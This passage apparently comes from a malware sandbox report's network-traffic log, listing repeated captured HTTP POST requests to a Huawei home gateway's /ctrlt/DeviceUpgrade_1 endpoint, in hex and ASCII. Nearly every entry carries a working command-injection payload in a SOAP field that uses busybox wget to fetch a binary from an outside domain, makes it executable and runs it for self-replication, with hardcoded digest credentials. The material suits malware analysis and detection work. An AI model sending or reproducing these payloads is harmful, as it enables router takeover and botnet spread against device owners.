xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/.amk -r /huawei; /bin/busybox chmod 777 /tmp/.amk; sh /tmp/.amk)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 452Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 2e 61 6d 6b 20 2d 72 20 2f 68 75 61 77 65 69 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 61 6d 6b 3b 20 73 68 20 2f 74 6d 70 2f 2e 61 6d 6b 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/.amk -r /huawei; /bin/busybox chmod 777 /tmp/.amk; sh /tmp/.amk)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 452Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 2e 61 6d 6b 20 2d 72 20 2f 68 75 61 77 65 69 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 61 6d 6b 3b 20 73 68 20 2f 74 6d 70 2f 2e 61 6d 6b 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/.amk -r /huawei; /bin/busybox chmod 777 /tmp/.amk; sh /tmp/.amk)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 3b 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g amkbins.duckdns.org -l /tmp/ascaris -r /bins/ascaris.mips;chmod 777 /tmp/ascaris;/tmp/ascaris huawei.selfrep;rm -rf /tmp/ascaris)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 3b 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope 